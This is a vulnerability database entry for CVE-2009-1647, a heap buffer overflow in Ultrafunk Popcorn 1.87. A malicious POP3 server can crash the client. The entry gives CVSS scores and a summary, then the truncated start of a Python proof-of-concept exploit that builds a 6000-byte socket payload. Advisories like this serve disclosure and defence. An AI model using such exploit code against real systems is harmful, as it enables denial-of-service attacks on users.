9.3
CVSSv2

CVE-2009-1647

Published: 15/05/2009 Updated: 29/09/2017
CVSS v2 Base Score: 9.3 | Impact Score: 10 | Exploitability Score: 8.6
VMScore: 935
Vector: AV:N/AC:M/Au:N/C:C/I:C/A:C

Vulnerability Summary

Heap-based buffer overflow in popcorn.exe in Ultrafunk Popcorn 1.87 allows remote POP3 servers to cause a denial of service (application crash) via a long string in a +OK response. NOTE: some of these details are obtained from third party information.

Vulnerable Product Search on Vulmon Subscribe to Product

ultrafunk popcorn 1.87

Exploits

#!/usr/bin/python #[x]Product download : wwwultrafunkcom/products/popcorn/ #[+]Founder : xCJPx #[+]Greeting : His0k4,Sub-Zero,Bibi-info,Aach2006,Youness,Simitch,Halimz,Bibicha :=) #[-]Seni seviyorum, base64_decode('TW91bmE='); from socket import * import struct buffer="\x41"*6000 # just random s = socket(AF_INET, SOCK_STREAM) sbind ...